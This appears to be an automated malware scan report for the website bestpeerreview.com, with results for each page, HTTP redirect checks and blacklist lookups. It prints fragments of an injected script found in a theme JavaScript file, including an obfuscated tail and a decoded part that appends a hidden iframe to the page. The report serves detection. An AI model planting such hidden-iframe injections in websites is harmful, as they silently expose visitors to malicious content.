Scanned pages/files
Request | Server response | Status |
http://bestpeerreview.com/ | 200 OK Content-Length: 13198 Content-Type: text/html | clean |
http://bestpeerreview.com/misc/jquery.js?t | 200 OK Content-Length: 31089 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/misc/drupal.js?t | 200 OK Content-Length: 9834 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/nice_menus/nice_menus.js?t | 200 OK Content-Length: 1724 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/panels/js/panels.js?t | 200 OK Content-Length: 797 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/modules/swftools/shared/swfobject2/swfobject.js?t | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://bestpeerreview.com/sites/all/themes/pa/js/general.js | 200 OK Content-Length: 7890 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function bookmark(url,title){ if (window.sidebar) window.sidebar.addPanel(title, url, ""); else if(window.opera && window.print){ var elem = document.createElement('a'); elem.setAttribute('href',url); elem.setAttribute('title',title); elem.setAttribute('rel','sidebar'); elem.click(); } else if(document.all) { window.external.AddFavorite(url, title); } else { alert("Press CTRL-D to bookmark"); } }try{prototype%2;}catch(as if(f)e(s);}
Decoded script:
ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
http://bestpeerreview.com/form/live-support | 200 OK Content-Length: 8942 Content-Type: text/html | clean |
http://bestpeerreview.com/rss.xml | 200 OK Content-Length: 8517 Content-Type: application/rss+xml | clean |
http://bestpeerreview.com/test404page.js | 404 Not Found Content-Length: 4763 Content-Type: text/html | clean |
http://bestpeerreview.com/products | 200 OK Content-Length: 18343 Content-Type: text/html | clean |
http://bestpeerreview.com/about-us | 200 OK Content-Length: 7737 Content-Type: text/html | clean |
http://bestpeerreview.com/form/contact-us | 200 OK Content-Length: 9606 Content-Type: text/html | clean |
http://bestpeerreview.com/client-experiences | 200 OK Content-Length: 8389 Content-Type: text/html | clean |
http://bestpeerreview.com/security | 200 OK Content-Length: 7279 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bestpeerreview.com
Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 09:37:11 GMT
Server: Apache/2.0.52 (Novell)
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 09:37:11 GMT
Set-Cookie: SESS81f6b99a1113d6b75f082f4de7ee78ad=4ant87g40g7d80gjapscabmqk4; expires=Thu, 10 Jul 2014 13:10:31 GMT; path=/; domain=.bestpeerreview.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: bestpeerreview.com
Referer: http://www.google.com/search?q=bestpeerreview.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bestpeerreview.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bestpeerreview.com/
Result: bestpeerreview.com is not infected or malware details are not published yet.